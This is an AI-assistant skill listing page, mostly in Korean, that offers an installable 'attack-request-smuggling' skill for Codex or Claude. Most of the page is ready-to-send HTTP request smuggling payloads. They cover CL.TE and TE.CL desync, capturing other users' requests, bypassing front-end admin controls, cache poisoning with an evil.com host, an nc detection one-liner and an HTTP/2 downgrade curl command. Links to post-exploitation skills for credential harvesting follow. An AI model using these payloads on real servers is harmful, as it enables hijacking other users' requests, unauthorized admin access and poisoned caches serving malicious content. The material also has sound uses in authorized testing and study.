메뉴
HTTP request smuggling — CL.TE, TE.CL, TE.TE desync attacks for cache poisoning and auth bypass
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
| name | attack-request-smuggling |
| description | HTTP request smuggling — CL.TE, TE.CL, TE.TE desync attacks for cache poisoning and auth bypass |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["request-smuggling","http-desync","web","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444"] |
| chains_with | ["attack-cache-poison","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-cache-poison":"Smuggling + cache = stored XSS/redirect for all users"} |
Exploit disagreements between front-end and back-end servers on request boundary parsing (Content-Length vs Transfer-Encoding) to smuggle a second request.
CL.TE (front uses Content-Length, back uses Transfer-Encoding):
POST / HTTP/1.1
Host: TARGET
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
TE.CL (front uses Transfer-Encoding, back uses Content-Length):
POST / HTTP/1.1
Host: TARGET
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
Send ambiguous request, measure response time:
# CL.TE detection (timeout = vulnerable)
printf 'POST / HTTP/1.1\r\nHost: TARGET\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\nX' | timeout 10 nc TARGET 80
CL.TE confirmed:
POST / HTTP/1.1
Host: TARGET
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404-proof HTTP/1.1
X: x
If next request to / returns 404 or different page, smuggling is confirmed.
Capture other user's request:
POST / HTTP/1.1
Host: TARGET
Content-Length: 100
Transfer-Encoding: chunked
0
POST /log HTTP/1.1
Content-Length: 10000
Content-Type: application/x-www-form-urlencoded
data=
Next user's request is appended to data= parameter.
Bypass front-end access controls:
POST / HTTP/1.1
Host: TARGET
Content-Length: 50
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: TARGET
X: x
Cache poisoning via smuggling:
POST / HTTP/1.1
Host: TARGET
Content-Length: 100
Transfer-Encoding: chunked
0
GET /static/main.js HTTP/1.1
Host: evil.com
X: x
# HTTP/2 downgrade smuggling
curl --http2 https://TARGET/ \
-H "Content-Length: 0" \
-H "Transfer-Encoding: chunked" \
-d "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: TARGET\r\n\r\n"
| Finding | Severity |
|---|---|
| Request smuggling → capture user requests | Critical (P1) |
| Smuggling → admin access bypass | Critical (P1) |
| Smuggling → cache poisoning | Critical (P1) |
| CL.TE or TE.CL desync confirmed | High (P2) |
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools